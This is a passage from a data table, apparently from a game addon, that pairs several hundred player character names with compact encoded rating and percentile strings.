["Leto"] = "RM:659/62%",
["Babyeric"] = "RB:305/51%RM:421/64%",
["Agoblin"] = "CB:38/3%CM:242/23%",
["Booyah"] = "CB:85/10%UM:404/42%",
["Tinaer"] = "UB:315/40%RM:557/59%",
["Zephlock"] = "LB:771/97%LM:935/95%",
["Thenicker"] = "RT:422/52%EB:621/84%EM:721/79%",
["Cameraman"] = "UM:385/41%",
["Rogdarr"] = "RB:385/52%EM:841/90%",
["Swashii"] = "CT:36/14%UB:374/44%UM:400/41%",
["Frye"] = "EB:604/77%EM:742/87%",
["Zumboto"] = "UB:326/43%UM:450/49%",
["Gagonmyanus"] = "CB:175/18%",
["Velvalla"] = "RB:531/69%RM:488/50%",
["Oneseventwo"] = "EB:685/92%RM:614/67%",
["Lsdisfunkids"] = "RB:474/63%RM:666/73%",
["Dirtydeedz"] = "EB:574/75%EM:823/85%",
["Tiagor"] = "UB:218/26%RM:458/50%",
["Aggressiøn"] = "EB:593/76%EM:829/85%",
["Makstlide"] = "CB:166/21%UM:400/43%",
["Knfrozen"] = "CB:81/22%CM:201/19%",
["Kriegoon"] = "EB:685/86%EM:812/84%",
["Matchatea"] = "RB:377/52%RM:599/66%",
["Sniffmiester"] = "CB:157/19%CM:227/23%",
["Dzf"] = "RB:324/61%RM:536/73%",
["Omegapog"] = "UB:295/36%RM:702/74%",
["Cattiman"] = "UB:232/28%RM:480/51%",
["Zapi"] = "EB:688/88%RM:500/51%",
["Mack"] = "EB:609/79%RM:696/67%",
["Hoesnack"] = "RB:502/63%UM:351/35%",
["Fierydeath"] = "CM:60/4%",
["Garmonster"] = "RB:475/71%RM:547/74%",
["Skrraat"] = "RB:503/65%EM:846/87%",
["Tutuba"] = "RB:507/67%EM:703/76%",
["Boris"] = "RB:262/62%RM:395/63%",
["Croquetta"] = "RB:524/70%RM:617/68%",
["Hardnox"] = "EB:691/87%EM:862/89%",
["Pinklust"] = "UM:383/46%",
["Mahaloz"] = "CM:100/8%",
["Futamonster"] = "UM:368/37%",
["Aprïl"] = "CB:132/16%RM:560/59%",
["Felma"] = "RB:400/52%RM:612/67%",
["Fêâr"] = "RB:262/55%RM:462/68%",
["Koley"] = "LB:768/97%LM:930/97%",
["Incend"] = "SB:814/99%SM:1091/99%",
["Sheepology"] = "UB:313/40%RM:575/63%",
["Silverforge"] = "RM:502/55%",
["Huanggua"] = "CM:28/1%",
["Decoshim"] = "UM:261/43%",
["Keyou"] = "RM:561/59%",
["Kaixinguo"] = "CB:87/8%CM:111/9%",
["Yyaa"] = "UM:304/30%",
["Holdupnow"] = "CM:60/4%",
["Asphar"] = "RB:565/72%EM:628/80%",
["Asakira"] = "RB:501/63%RM:560/60%",
["Atethatsht"] = "CM:147/16%",
["Frostpillar"] = "EB:651/85%EM:891/92%",
["Jimmy"] = "RB:430/56%RM:634/68%",
["Zinrokh"] = "EB:735/93%EM:901/92%",
["Missionboy"] = "UB:387/46%UM:389/40%",
["Jarazel"] = "CT:26/0%RB:523/73%RM:640/70%",
["Alecbaldwiin"] = "CB:92/10%UM:272/27%",
["Zanza"] = "EB:724/94%EM:913/94%",
["Shmie"] = "UT:310/37%LB:753/97%EM:848/89%",
["Dudududududi"] = "CB:154/19%RM:503/55%",
["Blacktearsqq"] = "CM:34/2%",
["Faerian"] = "EB:650/85%EM:903/93%",
["Aaryn"] = "EB:581/76%RM:681/71%",
["Caitlyn"] = "UM:379/40%",
["Slee"] = "EB:672/87%EM:864/88%",
["Gon"] = "RM:528/58%",
["Kilumi"] = "RM:516/54%",
["Vteven"] = "CM:52/3%",
["Roglin"] = "RB:552/71%RM:676/64%",
["Thotmon"] = "RB:153/52%EM:558/76%",
["Fatheramorth"] = "CM:66/4%",
["Hector"] = "EB:751/94%EM:896/92%",
["Caliwarlock"] = "CM:237/24%",
["Timmy"] = "LB:748/97%LM:962/98%",
["Nefeitari"] = "RB:358/57%RM:467/68%",
["Itzara"] = "RB:576/73%RM:541/74%",
["Scorp"] = "EB:711/89%EM:737/77%",
["Titanmøde"] = "RM:469/50%",
["Rogibear"] = "UM:53/33%",
["Rawzz"] = "CB:72/8%UM:277/28%",
["Pizzafingers"] = "EB:703/89%EM:924/93%",
["Opiedoesit"] = "CB:73/8%RM:521/55%",
["Utherswife"] = "RB:487/67%EM:734/80%",
["Renons"] = "EB:660/83%EM:717/76%",
["Brussels"] = "EB:596/76%EM:802/83%",
["Kithana"] = "RM:461/50%",
["Remotectrl"] = "EB:697/88%EM:928/94%",
["Idoheals"] = "CB:123/13%UM:331/35%",
["Bighappy"] = "UB:225/28%RM:496/55%",
["Daddydiesel"] = "RB:582/74%EM:776/81%",
["Kirtsyy"] = "LB:749/97%EM:893/93%",
["Benzø"] = "UB:365/46%UM:428/43%",
["Drominar"] = "UB:84/39%",
["Bjb"] = "LB:753/95%LM:990/98%",
["Zapy"] = "EB:617/84%EM:886/92%",
["Dwarventank"] = "EM:833/86%",
["Iuv"] = "RT:432/56%UB:195/46%UM:331/38%",
["Gnarlybrown"] = "CB:167/19%EM:385/79%",
["Yeller"] = "EB:587/81%EM:686/75%",
["Doggaebi"] = "EB:722/92%LM:933/95%",
["Bigtime"] = "CB:182/23%RM:482/53%",
["Bbangshuttle"] = "EB:699/90%RM:581/64%",
["Beefknight"] = "EB:546/75%EM:811/87%",
["Popopalapala"] = "CB:167/19%UM:291/30%",
["Goldsoojeo"] = "EB:705/90%CM:83/7%",
["Shelbert"] = "EB:633/80%EM:819/85%",
["Xgen"] = "LB:753/95%LM:945/96%",
["Baklava"] = "RB:331/65%UM:378/42%",
["Mysterfreeze"] = "CB:43/4%",
["Wolfcola"] = "EB:576/79%RM:632/69%",
["Daquanda"] = "EB:645/82%EM:832/86%",
["Lilolkrities"] = "RB:560/73%RM:561/58%",
["Ezzynep"] = "EB:718/92%EM:929/94%",
["Tiandista"] = "EB:729/92%EM:913/91%",
["Subdaws"] = "RB:433/55%EM:897/91%",
["Dyad"] = "RM:429/51%",
["Thehound"] = "UB:355/46%RM:276/63%",
["Angier"] = "CM:111/10%",
["Stormgust"] = "EB:605/80%EM:706/77%",
["Sailol"] = "EB:608/83%EM:854/90%",
["Angusdaddy"] = "UB:326/44%EM:713/78%",
["Bearoo"] = "UB:350/47%RM:624/69%",
["Xfactor"] = "RM:514/56%",
["Nidan"] = "CM:71/9%",
["Callthepopo"] = "EB:649/82%EM:813/84%",
["Zapich"] = "EB:582/76%RM:664/71%",
["Mightyguy"] = "RB:539/69%UM:331/33%",
["Scroncho"] = "RM:547/58%",
["Maxplanck"] = "LB:766/96%EM:907/91%",
["Moromath"] = "CB:38/2%CM:242/24%",
["Bloomfire"] = "LB:752/97%SM:978/99%",
["Sabenza"] = "CB:71/6%CM:192/18%",
["Sertrudia"] = "CM:144/13%",
["Lunalena"] = "CM:132/12%",
["Skeemon"] = "UB:383/49%UM:378/38%",
["Shabom"] = "RB:471/62%UM:455/49%",
["Smap"] = "UM:460/48%",
["Toastr"] = "CM:40/2%",
["Omegalock"] = "UB:280/35%CM:147/15%",
["Mootastical"] = "UB:212/26%RM:592/66%",
["Xabz"] = "EB:628/82%EM:702/76%",
["Tazdingoo"] = "RB:450/59%EM:781/84%",
["Dwarven"] = "CT:54/4%EB:574/80%LM:935/96%",
["Waldo"] = "LB:761/95%LM:944/95%",
["Tavios"] = "EB:595/76%RM:647/69%",
["Cladestyne"] = "EB:631/80%EM:775/81%",
["Likeness"] = "RB:561/71%EM:817/85%",
["Freakytiki"] = "EB:701/92%LM:960/97%",
["Bellere"] = "EB:688/87%LM:946/96%",
["Boxxey"] = "RB:408/54%EM:706/77%",
["Spazzin"] = "EB:595/76%EM:826/86%",
["Ragefear"] = "UM:287/29%",
["Mythlogical"] = "CB:155/18%UM:281/28%",
["Shock"] = "EB:611/86%EM:777/89%",
["Bambino"] = "EB:592/75%EM:749/79%",
["Retale"] = "UB:237/29%RM:628/65%",
["Fandarel"] = "RB:509/67%RM:556/59%",
["Iggylol"] = "CM:27/0%",
["Mineslave"] = "CB:193/20%RM:477/50%",
["Gamjatang"] = "UM:361/36%",
["Pumpwarrior"] = "RB:441/55%RM:520/55%",
["Einhardt"] = "RB:524/72%EM:780/84%",
["Shadowslash"] = "UM:255/26%",
["Blindsimba"] = "RM:693/73%",
["Entryri"] = "RB:532/68%RM:704/74%",
["Keydori"] = "EB:618/80%LM:950/96%",
["Dissolved"] = "EM:668/82%",
["Lamata"] = "UM:237/39%",
["Pumpyboi"] = "CM:210/20%",
["Blackhoney"] = "UB:310/41%UM:446/48%",
["Kaixinx"] = "CM:34/2%",
["Guccibeard"] = "CB:176/20%RM:573/63%",
["Jmb"] = "CM:26/0%",
["Magefarm"] = "EB:623/82%EM:743/80%",
["Bigbeans"] = "UB:316/41%RM:589/65%",
["Reznap"] = "RB:567/74%LM:949/96%",
["Frostlad"] = "CB:25/0%RM:597/66%",
["Myzteriox"] = "EB:693/87%LM:937/95%",
["Bannanaman"] = "EB:702/88%LM:971/98%",
["Leatherfaçe"] = "UM:445/46%",
["Renokas"] = "RB:422/58%RM:652/72%",
["Makisúpa"] = "CM:179/16%",
["Lilleyshokz"] = "EB:704/93%EM:878/92%",
["Omfgdanlol"] = "UM:328/34%",
["Cant"] = "UB:234/29%RM:627/69%",
["Tyle"] = "RB:501/67%RM:592/65%",
["Cernunnos"] = "CB:31/2%RM:573/61%",
["Whilson"] = "RB:427/56%EM:858/86%",
["Teleports"] = "LB:781/98%LM:937/96%",
["Leight"] = "RB:447/62%RM:598/66%",
["Lilley"] = "EB:593/82%EM:806/87%",
["Coldshots"] = "RB:508/67%EM:763/80%",
["Erik"] = "EB:734/93%EM:915/92%",
["Xezberzs"] = "EB:623/81%EM:883/88%",
["Longhorm"] = "CB:146/16%EM:862/90%",
["Ryg"] = "EB:661/90%LM:911/95%",
["Wreckie"] = "CM:30/1%",
["Backscratch"] = "EB:726/91%LM:969/97%",
["Mystigan"] = "EB:682/86%EM:801/83%",
["Steevee"] = "RB:388/74%EM:534/77%",
["Tastemycrit"] = "LB:761/95%EM:876/90%",
["Bullyboy"] = "UB:218/26%UM:416/44%",
["Shera"] = "CB:99/9%CM:231/23%",
["Alfawz"] = "UM:252/25%",
["Xuul"] = "CM:116/15%",
["Popemage"] = "RM:521/57%",
["Elvee"] = "RM:587/61%",
["Sadizm"] = "LB:759/95%EM:866/89%",
["Hecka"] = "CM:55/4%",
["Zehhto"] = "CM:63/4%",
["Ives"] = "RM:549/57%",
["Shadeynasty"] = "EB:576/80%EM:851/89%",
["Cyberrogue"] = "CB:111/13%UM:268/27%",
["Sylvaneth"] = "EB:640/82%EM:759/79%",
["Bubs"] = "UB:331/44%RM:605/67%",
["Lefthandlary"] = "EB:678/87%EM:887/91%",
["Retap"] = "UB:358/45%EM:916/93%",
["Diudiui"] = "CM:121/24%",
["Hecaté"] = "RB:475/65%EM:680/75%",
["Illandriah"] = "EB:588/78%RM:618/68%",
["Truven"] = "RB:476/63%EM:703/76%",
["Wildbeef"] = "ET:328/77%RB:394/74%EM:589/79%",
["Sinchilla"] = "CB:151/18%CM:219/22%",
["Wolfgangs"] = "UB:235/29%RM:557/59%",
["Terpsniper"] = "EB:605/80%RM:626/69%",
["Robyou"] = "EB:711/89%EM:892/91%",
["Hoicyfry"] = "EB:604/83%EM:815/87%",
["Akuni"] = "EM:774/84%",
["Buckowens"] = "UB:234/30%CM:201/24%",
["Enduros"] = "RM:443/62%",
["Rivampel"] = "EM:833/88%",
["Axons"] = "RM:532/58%",
["Zemalek"] = "EB:659/88%EM:881/92%",
["Coppafeelx"] = "EB:648/87%EM:805/86%",
["Thanatoso"] = "UM:416/45%",
["Spookyjimbo"] = "UM:481/47%",
["Overlord"] = "CM:33/2%",
["Aquafína"] = "CB:74/8%RM:531/58%",
["Eternallol"] = "RB:487/72%RM:520/72%",
["Bbycakes"] = "CB:77/7%UM:435/47%",
["Magesblood"] = "EM:891/90%",
["Rozzletof"] = "RM:550/57%",
["Lxr"] = "EB:657/88%EM:874/91%",
["Vesoovius"] = "LB:717/95%LM:919/96%",
["Hantogue"] = "RB:522/67%RM:644/69%",
["Swolledlegs"] = "UB:165/32%EM:566/76%",
["Digitalbath"] = "EB:601/82%EM:751/81%",
["Dikkawk"] = "UB:161/47%EM:707/84%",
["Carbide"] = "EB:532/77%EM:807/90%",
["Larissam"] = "UM:249/25%",
["Beefysushi"] = "RB:476/68%RM:622/69%",
["Thelinea"] = "UB:231/29%UM:449/49%",
["Yukkichan"] = "UB:202/25%UM:287/29%",
["Leäf"] = "UB:358/47%EM:730/79%",
["Potters"] = "CB:161/19%UM:391/41%",
["Warllyz"] = "UM:362/38%",
["Pannoowau"] = "EB:745/94%EM:899/92%",
["Dottori"] = "EB:670/86%EM:782/82%",
["Garos"] = "EB:591/75%EM:752/79%",
["Breotan"] = "EB:709/90%EM:821/85%",
["Slimere"] = "CB:37/4%",
["Attz"] = "CB:140/18%RM:602/62%",
["Badhømbre"] = "CB:39/4%UM:431/48%",
["Grizzlywings"] = "CM:51/4%",
["Kiez"] = "EM:705/77%",
["Tuggler"] = "CM:13/12%",
["Underbloob"] = "UB:381/48%EM:847/87%",
["Dönovan"] = "RM:563/62%",
["Itsmyfault"] = "CM:37/2%",
["Drunkmrlahey"] = "CM:67/9%",
["Ayydslmao"] = "CB:46/5%RM:708/74%",
["Masian"] = "CB:165/17%UM:124/25%",
["Åskeladd"] = "RM:543/58%",
["Guldhaniel"] = "CM:157/16%",
["Evilspally"] = "RM:385/62%",
["Xanzilla"] = "CT:29/5%UB:232/29%RM:657/72%",
["Mullygrubb"] = "RB:430/53%UM:373/38%",
["Bprjpr"] = "EB:627/85%LM:973/98%",
["Iwantfly"] = "EB:716/92%EM:876/91%",
["Mageshredder"] = "LB:764/96%EM:837/88%",
["Qwerfdsa"] = "LB:756/95%LM:935/95%",
["Critsalot"] = "EB:614/78%RM:686/73%",
["Prettycool"] = "CB:29/1%RM:610/67%",
["Nsideu"] = "EB:720/91%EM:907/92%",
["Notahunter"] = "RB:513/67%RM:599/64%",
["Jargar"] = "RB:323/61%RM:506/71%",
["Biubiubiui"] = "CB:95/11%UM:366/37%",
["Shortay"] = "UB:342/39%RM:592/63%",
["Swagdragon"] = "LB:731/96%EM:763/91%",
["Killington"] = "RB:465/61%EM:714/75%",
["Dq"] = "EB:611/84%EM:691/76%",
["Bigfupa"] = "CT:63/23%EB:722/92%EM:862/90%",
["Sojs"] = "LB:791/98%SM:1009/99%",
["Kkang"] = "EM:768/80%",
["Painnsufferz"] = "EB:647/83%RM:625/65%",
["Lurg"] = "RM:636/68%",
["Whenx"] = "CB:30/2%CM:62/6%",
["Chiraqi"] = "EB:663/85%EM:761/80%",
["Yubuheal"] = "UB:346/46%EM:706/78%",
["Tofer"] = "EB:663/85%EM:866/89%",
["Pinkvendetta"] = "CB:62/7%CM:30/1%",
["Mukbang"] = "CM:33/1%",
["Døømtherøøm"] = "UB:347/44%UM:443/45%",
["Pienis"] = "RB:498/73%EM:630/80%",
["Hairwetdontc"] = "RB:438/67%EM:607/79%",
["Basedgodbm"] = "CB:40/2%EM:741/79%",
["Unclekimo"] = "EB:625/81%EM:817/85%",
["Jigi"] = "EB:687/89%EM:729/79%",
["Kikashie"] = "CB:198/24%UM:284/29%",
["Kittycat"] = "RM:226/56%",
["Allmoist"] = "RB:442/58%RM:521/55%",
["Goldenrabbit"] = "EB:660/89%EM:809/87%",
["Dadshome"] = "CT:57/6%RB:489/67%RM:281/65%",
["Symplex"] = "UM:328/33%",
["Kusu"] = "EB:594/84%EM:747/85%",
["Jianghu"] = "CB:59/4%CM:104/8%",
["Musicmage"] = "EB:613/81%EM:841/89%",
["Sevarog"] = "CM:111/11%",
["Kushbull"] = "CM:95/11%",
["Ragny"] = "EB:616/80%EM:734/76%",
["Zebubble"] = "CB:91/11%RM:619/59%",
["Wraithseer"] = "EB:646/82%EM:814/85%",
["Zhiwuren"] = "UB:253/30%RM:501/53%",
["Samsungalaxy"] = "UB:360/48%RM:580/64%",
["Rylina"] = "RB:435/57%EM:751/81%",
["Overair"] = "RB:580/74%EM:788/82%",
["Sugarepstein"] = "UB:228/28%UM:401/43%",
["Husla"] = "LB:750/98%EM:893/94%",
["Lanadelbae"] = "RB:516/67%RM:622/64%",
["Totsy"] = "RB:520/72%EM:811/86%",
["Dubldutch"] = "UB:225/27%RM:645/61%",
["Icarryflag"] = "CM:164/22%",
["Sploit"] = "CB:98/10%UM:439/47%",
["Trainbikes"] = "RB:405/53%EM:914/93%",
["Tehgosuheals"] = "RM:522/57%",
["Scuba"] = "LB:766/96%EM:888/91%",
["Skils"] = "CM:105/14%",
["Saltypeanuts"] = "EB:707/93%EM:831/88%",
["Jubinator"] = "UB:277/36%EM:730/78%",
["Johnyutah"] = "CM:104/9%",
["Keror"] = "CB:32/1%CM:231/23%",
["Naldojuk"] = "EB:703/88%EM:856/88%",
["Iamkorean"] = "EB:641/87%EM:775/84%",
["Boxy"] = "LB:756/95%SM:1021/99%",
["Guruginseng"] = "CB:222/23%RM:650/69%",
["Kombar"] = "CM:32/1%",
["Vandes"] = "EB:724/91%EM:928/94%",
["Itsnotxploit"] = "RB:532/68%RM:652/70%",
["Wildmane"] = "EB:527/84%EM:699/88%",
["Cynikal"] = "SB:797/99%SM:1025/99%",
["Chrom"] = "EB:642/81%EM:828/86%",
["Janthrax"] = "LB:753/98%SM:986/99%",
["Spoomkin"] = "EM:583/79%",
["Trxz"] = "RB:498/69%RM:568/63%",
["Gidgey"] = "RM:534/59%",
["Drhorrbile"] = "CM:69/5%",
["Geotek"] = "EB:624/89%EM:777/88%",
["Aaron"] = "UM:271/27%",
["Dofzjs"] = "EB:578/76%EM:785/84%",
["Nemesiss"] = "RB:430/53%RM:584/62%",
["Beat"] = "RB:459/61%RM:666/73%",
["Keiarra"] = "CM:28/1%",
["Rongar"] = "CT:26/0%EB:531/79%EM:376/75%",
["Böunty"] = "CM:160/14%",
["Nuoyan"] = "CB:55/5%EM:757/79%",
["Olmanjenkins"] = "UB:335/38%RM:525/56%",
["Gnomeisbis"] = "EB:725/94%EM:875/93%",
["Briggy"] = "RB:438/67%RM:425/64%",
["Llanewrynn"] = "EB:601/83%EM:818/88%",
["Turkish"] = "CM:207/19%",
["Pallyohno"] = "UM:272/27%",
["Verzhul"] = "RM:463/65%",
["Bobrosslives"] = "EB:601/83%EM:863/93%",
["Palsgraf"] = "RM:586/63%",
["Caspr"] = "UM:301/39%",
["Gothikk"] = "RM:193/52%",
["Pat"] = "RM:559/60%",
["Ahmed"] = "UM:345/36%",
["Awntflowz"] = "EB:622/79%EM:783/82%",
["Sweetcyanide"] = "EB:702/89%EM:913/92%",
["Inphyy"] = "UB:225/29%RM:509/72%",
["Holyjoe"] = "RB:526/73%RM:502/55%",
["Sapuku"] = "RM:364/62%",
["Sneakymoose"] = "EB:673/91%LM:919/96%",
["Wakkaflaka"] = "CM:36/2%",
["Funisher"] = "UM:341/34%",
["Limë"] = "EB:633/82%EM:833/86%",
["Daelinara"] = "RB:477/66%EM:692/76%",
["Molmor"] = "EB:717/91%SM:1001/99%",
["Slickbach"] = "UM:378/39%",
["Garshi"] = "EM:786/76%",
["Cameron"] = "EB:668/87%LM:967/97%",
["Rinkx"] = "LB:788/98%LM:973/98%",
["Pinkballs"] = "UM:328/33%",
["Discowave"] = "UB:302/38%EM:788/82%",
["Simplicité"] = "UB:309/35%RM:495/52%",
["Assenav"] = "CM:45/6%",
["Hawkhanki"] = "UB:354/46%RM:637/70%",
["Quartzbanger"] = "CB:108/13%UM:293/30%",
["Vallith"] = "UB:344/45%RM:584/64%",
["Zugzugmongo"] = "CM:242/24%",
["Hellion"] = "UB:343/42%RM:506/54%",
["Mollywhoppin"] = "EB:694/87%EM:771/81%",
["Ninefingers"] = "UB:204/25%RM:531/69%",
["Abuur"] = "RB:454/73%EM:607/78%",
["Azter"] = "CM:200/19%",
["Loressa"] = "UT:375/48%RB:517/69%EM:740/79%",
["Fatslappah"] = "CB:200/24%UM:376/39%",
["Ahrenar"] = "CM:242/24%",
["Perspective"] = "CB:75/7%RM:490/54%",
["Kriter"] = "UB:299/38%CM:99/8%",
["Crimsyn"] = "RB:465/61%RM:587/62%",
["Frostbytten"] = "EB:585/77%EM:800/85%",
["Flaxenowl"] = "UB:164/43%EM:656/80%",
["Alilkilla"] = "CB:68/8%RM:585/63%",
["Chillalot"] = "CB:37/3%CM:220/22%",
["Zergmaster"] = "EB:739/93%LM:948/96%",
["Lupich"] = "RB:465/64%RM:594/65%",
["Jeese"] = "EB:578/76%RM:668/73%",
["Develyn"] = "RB:531/69%EM:730/76%",
["Laserturkey"] = "EB:549/84%EM:726/88%",
["Ieben"] = "EB:630/88%LM:892/95%",
["Warstomper"] = "CM:175/16%",
["Yuforic"] = "RB:301/50%EM:725/86%",
["Pancetta"] = "EB:633/83%RM:557/61%",
["Farazhim"] = "UB:238/29%EM:683/75%",
["Darthplaguiz"] = "UB:315/40%RM:495/51%",
["Nvk"] = "CB:38/3%CM:222/22%",
["Âkame"] = "EB:634/80%EM:719/76%",
["Diviine"] = "UM:312/32%",
["Pyroblaster"] = "LB:777/97%LM:937/96%",
["Exandor"] = "EB:714/91%EM:773/83%",
["Poonti"] = "SB:840/99%SM:1022/99%",
["Keeslar"] = "UT:99/40%EB:731/92%EM:852/88%",
["Intolerance"] = "EB:689/91%EM:842/92%",
["Animaldoctor"] = "UB:326/41%RM:609/65%",
["Kovah"] = "EB:602/78%EM:900/91%",
["Ferny"] = "CB:35/3%CM:179/17%",
["Eung"] = "EB:581/84%EM:844/92%",
["Mysd"] = "RM:400/69%",
["Mjin"] = "EB:736/93%EM:863/89%",
["Wenchmaster"] = "EB:666/85%EM:862/89%",
["Necrodancer"] = "EB:665/85%EM:849/85%",
["Kobeebrynt"] = "UB:234/30%RM:649/71%",
["Wtbgladiator"] = "EB:675/92%EM:876/94%",
["Soho"] = "LB:783/98%EM:923/94%",
["Deydok"] = "UM:294/30%",
["Fourmoreyear"] = "CM:30/1%",
["Pãnic"] = "LB:781/98%LM:991/98%",
["Powergamer"] = "RM:679/74%",
["Moes"] = "EB:646/87%EM:839/89%",
["Fizker"] = "EB:686/91%EM:902/94%",
["Mandream"] = "RB:507/67%RM:577/64%",
["Tampopo"] = "UB:358/45%UM:412/42%",
["Clavius"] = "UB:326/42%UM:443/48%",
["Obscured"] = "RB:533/74%EM:798/87%",
["Voluble"] = "EB:555/77%EM:839/90%",
["Mifan"] = "CM:184/18%",
["Boomstar"] = "EB:564/86%EM:739/88%",
["Windfürer"] = "CB:197/24%UM:407/44%",
["Krunkageddon"] = "RM:404/62%",
["Shalmack"] = "SB:834/99%SM:996/99%",
["Schlump"] = "EM:766/79%",
["Hellstrom"] = "RB:430/56%EM:799/83%",
["Preston"] = "CB:62/5%",
["Spòón"] = "CB:86/8%",
["Msimangu"] = "CB:79/9%",
["Viridian"] = "UB:382/49%RM:297/51%",
["Bigdaddyboof"] = "UB:213/28%",
["Hotice"] = "CM:52/2%",
["Unclebenis"] = "CB:95/11%RM:572/63%",
["Awesomie"] = "EB:738/93%EM:870/89%",
["Azanoth"] = "LB:761/95%EM:922/94%",
["Boomchad"] = "SB:808/99%SM:1026/99%",
["Sephtanks"] = "RB:555/71%EM:552/75%",
["Jackitripper"] = "EB:666/91%LM:908/95%",
["Coinflip"] = "LB:752/97%EM:862/91%",
["Kayzèr"] = "EB:557/77%RM:662/73%",
["Tankchad"] = "EB:724/91%EM:876/90%",
["Holyfreeze"] = "RB:479/64%RM:644/71%",
["Brickyd"] = "LB:767/96%LM:937/95%",
["Awind"] = "EB:672/91%EM:834/89%",
["Faedriel"] = "EB:706/90%EM:851/88%",
["Spreewheels"] = "LB:748/95%EM:887/91%",
["Feedwheels"] = "EB:666/90%EM:729/79%",
["Nikune"] = "LB:733/96%LM:876/95%",
["Merrlin"] = "LB:782/98%LM:977/98%",
["Echovald"] = "EB:638/83%EM:757/81%",
["Riverleaf"] = "EB:705/94%EM:745/90%",
["Tumna"] = "EB:711/89%EM:894/91%",
["Ecnailla"] = "SB:808/99%SM:1007/99%",
["Pepsii"] = "UB:259/33%RM:642/70%",
["Nowyousee"] = "LB:782/98%LM:932/95%",
["Honeybomb"] = "CB:153/17%RM:497/70%",
["Snuglebug"] = "EB:591/78%RM:675/72%",
["Shockadin"] = "EB:698/93%EM:860/90%",
["Dcm"] = "RB:376/51%RM:626/69%",
["Borborygmoz"] = "EB:611/79%EM:742/78%",
["Ripum"] = "EB:535/77%EM:848/90%",
["Glessana"] = "CB:44/4%CM:27/0%",
["Bamßam"] = "EB:667/90%EM:763/83%",
["Thugnasty"] = "LB:764/97%LM:929/96%",
["Hussie"] = "LB:766/96%EM:913/93%",
["Remax"] = "EB:719/92%EM:846/89%",
["Chaosfiends"] = "EB:741/93%EM:896/91%",
["Holytriage"] = "LB:767/98%LM:924/96%",
["Cawkodile"] = "CM:163/15%",
["Vaelith"] = "LB:780/97%LM:964/97%",
["Vulu"] = "CB:207/22%UM:312/31%",
["Jott"] = "EB:746/94%EM:916/93%",
["Nosleep"] = "CB:144/16%EM:745/81%",
["Stabuhm"] = "UM:459/48%",
["Tanary"] = "UM:94/30%",
["Zelk"] = "RM:499/51%",
["Sugi"] = "RB:421/56%EM:855/87%",
["Coldblooded"] = "SB:806/99%SM:1007/99%",
["Cosmicjerry"] = "RM:648/69%",
["Nolmanz"] = "UB:213/25%RM:655/70%",
["Allisoon"] = "RB:487/67%RM:610/68%",
["Dibear"] = "EB:665/85%EM:906/93%",
["Thiccieboi"] = "EB:658/83%EM:842/87%",
["Spezza"] = "EM:735/79%",
["Warlune"] = "LB:743/97%EM:888/93%",
["Hannzo"] = "EB:737/93%LM:944/95%",
["Lûlu"] = "SB:785/99%SM:1014/99%",
["Barnaby"] = "EB:608/84%EM:833/89%",
["Brestia"] = "EB:742/93%EM:872/90%",
["Hoz"] = "EB:686/87%EM:866/89%",
["Deathguide"] = "RB:404/52%UM:354/36%",
["Deedohair"] = "EB:718/92%EM:824/87%",
["Kae"] = "EB:617/89%EM:821/94%",
["Azrodel"] = "EB:724/91%EM:931/94%",
["Stompevil"] = "RB:385/52%RM:121/61%",
["Doofus"] = "UB:270/34%RM:556/59%",
["Lokibackstab"] = "UB:389/49%RM:684/73%",
["Ceroo"] = "UB:371/48%RM:606/67%",
["Hekaler"] = "EB:549/76%RM:686/74%",
["Iveus"] = "EB:600/79%EM:898/93%",
["Syer"] = "RB:583/74%EM:841/86%",
["Raiÿne"] = "CB:162/19%UM:296/38%",
["Jadex"] = "EB:624/79%LM:937/95%",
["Glk"] = "CM:126/12%",
["Marado"] = "RB:507/67%EM:741/80%",
["Choak"] = "UM:356/36%",
["Tsuru"] = "UT:216/27%RB:434/55%EM:819/85%",
["Fased"] = "EB:704/94%EM:734/80%",
["Krugdr"] = "LB:772/98%LM:947/98%",
["Kruglite"] = "UM:368/39%",
["Clareta"] = "LB:764/96%LM:970/97%",
["Yenao"] = "CB:197/24%EM:802/86%",
["Bazumba"] = "RM:578/64%",
["Hotness"] = "RM:331/64%",
["Watersnipe"] = "CM:30/1%",
["Starglow"] = "RB:419/58%EM:726/79%",
["Huanchaots"] = "RB:421/59%EM:685/79%",
["Flug"] = "RM:469/51%",
["Dangdangdang"] = "EB:524/76%EM:868/93%",
["Lianassa"] = "RB:426/58%RM:545/60%",
["Kwatermelon"] = "UM:283/29%",
["Painhealer"] = "CB:140/16%RM:518/57%",
["Lucefaa"] = "CT:156/20%EB:519/89%EM:790/82%",
["Lindar"] = "CM:81/7%",
["Chaosmarine"] = "CB:28/1%CM:52/4%",
["Regulating"] = "RB:419/51%RM:528/56%",
["Lockrobstah"] = "CM:107/11%",
["Biggles"] = "CM:106/12%",
["Smegmacannon"] = "UM:314/32%",
["Proletareeat"] = "CM:155/14%",
["Koalayumyum"] = "CB:119/13%RM:380/60%",
["Ivaa"] = "CB:101/10%RM:566/63%",
["Huffar"] = "EB:542/75%RM:597/64%",
["Valiara"] = "EB:557/77%EM:697/77%",
["Poofthemagic"] = "RB:391/51%RM:577/63%",
["Gafa"] = "UB:202/25%RM:595/65%",
["Sainnt"] = "RM:659/70%",
["Amilea"] = "EB:634/87%EM:841/90%",
["Frackalaka"] = "LB:766/96%EM:851/87%",
["Iboost"] = "CM:136/12%",
["Dripjames"] = "UM:334/35%",
["Lilshrimp"] = "EM:706/77%",
["Qaktree"] = "RM:461/51%",
["Balaul"] = "CB:133/16%CM:131/13%",
["Craigerz"] = "RM:572/63%",
["Nyelaa"] = "UM:358/36%",
["Bleedy"] = "CB:114/13%UM:452/48%",
["Mnkys"] = "UB:328/37%UM:356/36%",
["Nitronox"] = "CM:62/9%",
["Magebaba"] = "RB:400/52%EM:750/81%",
["Snavvie"] = "UB:407/49%UM:377/38%",
["Idleness"] = "RB:474/63%EM:685/75%",
["Missafkay"] = "EB:664/91%EM:790/86%",
["Medeora"] = "EB:586/77%UM:368/37%",
["Maureenpondy"] = "RB:535/70%RM:661/70%",
["Conscience"] = "RB:536/74%EM:717/77%",
["Deceased"] = "LB:758/96%EM:907/94%",
["Throksul"] = "UM:227/42%",
["Fixyouriteup"] = "UM:411/44%",
["Yez"] = "UB:250/31%UM:447/49%",
["Orbitalz"] = "CM:117/12%",
["Doubii"] = "CB:88/10%CM:189/18%",
["Dava"] = "RB:537/74%EM:740/80%",
["Kuekuatsheu"] = "UB:324/40%RM:611/65%",
["Lionidas"] = "UB:274/35%RM:593/66%",
["Archzero"] = "EB:419/75%RM:387/62%",
["Daevise"] = "RB:571/73%EM:778/82%",
["Darkcreole"] = "EB:645/83%EM:787/82%",
["Bigregime"] = "CB:137/16%RM:553/59%",
